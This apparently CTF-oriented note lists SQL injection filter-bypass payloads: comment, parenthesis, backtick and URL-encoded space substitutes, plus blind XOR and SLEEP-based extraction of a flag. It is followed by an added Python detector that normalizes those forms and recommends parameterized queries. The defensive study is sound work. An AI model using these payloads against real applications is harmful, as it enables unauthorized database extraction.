Summary of SQL Injection Bypasses
A record of some SQL injection bypass techniques; they should come in handy later.
Replacing spaces
1. Inline comments
    select/**/*from/**/user;
2. Using parentheses
    select * from user where id = 1 and (if(ascii(substr(database()from(1)for(1)))=115,sleep(4),null));
This can be combined with XOR
    select * from user where id=1^(SELECT(ASCII(MID((SELECT((flag))FROM(ctf)),1,1))=1))^1=1
3. Backticks
    select * from passage where id=1^(SELECT(ASCII(MID((SELECT`flag`FROM`ctf`),1,1))=102))^1=1;
4. Tab or two spaces
    select content from passage where id=ELT(left((select flag from ctf),1)='f',SLEEP(1))
5. URL encoding
    %20 %09 %0a %0b %0c %0d %a0 %00
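
From the defender's side, the list above is why a filter that only rejects literal spaces does not hold. The following is an added example, not part of the original post: it folds each separator form listed here into a single space before looking for SQL keywords. The function names, the keyword list and the two-keyword threshold are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Space substitutes listed above: inline comments, parentheses, backticks,
# and the bytes behind %09 %0a %0b %0c %0d %a0 %00 (plus %20 itself).
COMMENT = re.compile(r"/\*.*?\*/", re.S)
SEPARATORS = re.compile(r"[\s\x00\xa0()`]+")
# Assumed keyword list for this example; tune it for the application.
KEYWORDS = {"select", "from", "where", "union", "sleep", "if",
            "ascii", "substr", "mid", "elt", "database"}

def decode(raw: str) -> str:
    # latin-1 keeps %a0 and %00 as single characters instead of failing.
    return unquote_to_bytes(raw).decode("latin-1")

def normalize(raw: str) -> str:
    """Collapse every space substitute into one ASCII space, lowercase."""
    text = COMMENT.sub(" ", decode(raw))
    return SEPARATORS.sub(" ", text).strip().lower()

def sql_keywords(raw: str) -> set:
    return KEYWORDS & set(re.findall(r"[a-z_]+", normalize(raw)))

def passes_space_blacklist(raw: str) -> bool:
    """The weak filter: accept anything without a literal 0x20."""
    return " " not in decode(raw)

def is_suspicious(raw: str) -> bool:
    # Assumed threshold: two or more distinct SQL keywords in one parameter.
    return len(sql_keywords(raw)) >= 2

if __name__ == "__main__":
    samples = [  # first three come from the page, the rest are constructed
        "select/**/*from/**/user;",
        "1^(SELECT(ASCII(MID((SELECT((flag))FROM(ctf)),1,1))=1))^1=1",
        "1^(SELECT(ASCII(MID((SELECT`flag`FROM`ctf`),1,1))=102))^1=1",
        "select%09flag%0afrom%a0ctf",
        "42",
        "letter from Paris",
    ]
    for s in samples:
        print(f"{passes_space_blacklist(s)!s:5} {is_suspicious(s)!s:5} {s}")
```

Normalizing like this serves detection and logging; the fix for the injection itself is a parameterized query, which makes every one of these separator forms inert.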